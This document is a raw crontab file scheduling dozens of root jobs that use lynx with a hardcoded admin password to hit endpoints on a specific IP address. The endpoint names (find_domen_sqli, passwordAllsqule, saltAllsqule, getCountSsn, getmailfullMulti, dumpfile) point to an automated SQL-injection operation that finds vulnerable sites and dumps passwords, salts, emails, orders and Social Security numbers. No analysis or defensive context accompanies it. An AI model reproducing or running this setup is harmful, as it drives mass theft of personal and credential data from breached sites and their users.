#####NEW#####
* * * * * root /usr/bin/lynx  -dump -auth=admin:meza74@   http://94.103.82.105/posts/check_domens >/dev/null 2>&1
* * * * * root /usr/bin/lynx  -dump -auth=admin:meza74@   http://94.103.82.105/posts/find_domen_sqli >/dev/null 2>&1
* * * * * root /usr/bin/lynx  -dump -auth=admin:meza74@   http://94.103.82.105/posts/multi_all >/dev/null 2>&1
* * * * * root /usr/bin/lynx  -dump -auth=admin:meza74@   http://94.103.82.105/posts/errorFinder_all >/dev/null 2>&1



* * * * * root /usr/bin/lynx  -dump -auth=admin:meza74@   http://94.103.82.105/posts/dumping_one_filed_name >/dev/null 2>&1
* * * * * root /usr/bin/lynx  -dump -auth=admin:meza74@   http://94.103.82.105/posts/dumping_one >/dev/null 2>&1


* * * * * root /usr/bin/lynx  -dump -auth=admin:meza74@   http://94.103.82.105/posts/getToAll >/dev/null 2>&1

* * * * * root /usr/bin/lynx  -dump -auth=admin:meza74@   http://94.103.82.105/posts/getmailfullMulti >/dev/null 2>&1



* * * * * root /usr/bin/lynx  -dump -auth=admin:meza74@   http://94.103.82.105/posts/multi >/dev/null 2>&1
* * * * * root /usr/bin/lynx  -dump -auth=admin:meza74@   http://94.103.82.105/posts/errorFinder >/dev/null 2>&1
* * * * * root /usr/bin/lynx  -dump -auth=admin:meza74@   http://94.103.82.105/posts/getcountmail >/dev/null 2>&1
* * * * * root /usr/bin/lynx  -dump -auth=admin:meza74@   http://94.103.82.105/posts/getcountmailMSSQL >/dev/null 2>&1

* * * * * root /usr/bin/lynx  -dump -auth=admin:meza74@   http://94.103.82.105/posts/passwordAllsqule >/dev/null 2>&1
* * * * * root /usr/bin/lynx  -dump -auth=admin:meza74@   http://94.103.82.105/posts/nameAllsqule >/dev/null 2>&1
* * * * * root /usr/bin/lynx  -dump -auth=admin:meza74@   http://94.103.82.105/posts/loginAllsqule >/dev/null 2>&1
* * * * * root /usr/bin/lynx  -dump -auth=admin:meza74@   http://94.103.82.105/posts/phoneAllsqule >/dev/null 2>&1
* * * * * root /usr/bin/lynx  -dump -auth=admin:meza74@   http://94.103.82.105/posts/saltAllsqule >/dev/null 2>&1



* * * * * root /usr/bin/lynx  -dump -auth=admin:meza74@   http://94.103.82.105/posts/getCountSsn >/dev/null 2>&1
* * * * * root /usr/bin/lynx  -dump -auth=admin:meza74@   http://94.103.82.105/posts/getCountSsnMSSQL >/dev/null 2>&1


* * * * * root /usr/bin/lynx  -dump -auth=admin:meza74@   http://94.103.82.105/posts/getCountOrders >/dev/null 2>&1
* * * * * root /usr/bin/lynx  -dump -auth=admin:meza74@   http://94.103.82.105/posts/getCountOrdersMSSQL >/dev/null 2>&1

* * * * * root /usr/bin/lynx  -dump -auth=admin:meza74@   http://94.103.82.105/posts/count_16 >/dev/null 2>&1
* * * * * root /usr/bin/lynx  -dump -auth=admin:meza74@   http://94.103.82.105/posts/count_new >/dev/null 2>&1


* * * * * root /usr/bin/lynx  -dump -auth=admin:meza74@   http://94.103.82.105/posts/typecorp_pass >/dev/null 2>&1
* * * * * root /usr/bin/lynx  -dump -auth=admin:meza74@   http://94.103.82.105/posts/typecorp_one >/dev/null 2>&1

* * * * * root /usr/bin/lynx  -dump -auth=admin:meza74@   http://94.103.82.105/posts/getInfo_pr >/dev/null 2>&1
* * * * * root /usr/bin/lynx  -dump -auth=admin:meza74@   http://94.103.82.105/posts/getInfo_alexa >/dev/null 2>&1
* * * * * root /usr/bin/lynx  -dump -auth=admin:meza74@   http://94.103.82.105/posts/getInfo_country >/dev/null 2>&1
* * * * * root /usr/bin/lynx  -dump -auth=admin:meza74@   http://94.103.82.105/posts/getInfo_country2 >/dev/null 2>&1

* * * * * root /usr/bin/lynx  -dump -auth=admin:meza74@   http://94.103.82.105/posts/abuse >/dev/null 2>&1
* * * * * root /usr/bin/lynx  -dump -auth=admin:meza74@   http://94.103.82.105/posts/pid_stop >/dev/null 2>&1
*/15 * * * * root /usr/bin/lynx  -dump -auth=admin:meza74@   http://94.103.82.105/posts/dumpfile >/dev/null 2>&1
*/15 * * * * root /usr/bin/lynx  -dump -auth=admin:meza74@   http://94.103.82.105/posts/dumpfile2 >/dev/null 2>&1
*/1 * * * * root /usr/bin/lynx  -dump -auth=admin:meza74@ 	http://94.103.82.105/posts/cleanmail >/dev/null 2>&1


*/3 * * * * root /usr/bin/lynx  -dump -auth=admin:meza74@   http://94.103.82.105/posts/mailinfo2 >/dev/null 2>&1
* * * * * root /usr/bin/lynx  -dump -auth=admin:meza74@   http://94.103.82.105/posts/add_cron >/dev/null 2>&1
05 04 */7 * * root /usr/bin/lynx  -dump -auth=admin:meza74@  http://94.103.82.105/posts/optimize >/dev/null 2>&1
05 08 */7 * * root /usr/bin/lynx  -dump -auth=admin:meza74@  http://94.103.82.105/posts/repaire >/dev/null 2>&1



* * * * * root /usr/bin/lynx  -dump -auth=admin:meza74@    http://94.103.82.105/posts/ssn_16 >/dev/null 2>&1
* * * * * root /usr/bin/lynx  -dump -auth=admin:meza74@    http://94.103.82.105/posts/count_new >/dev/null 2>&1
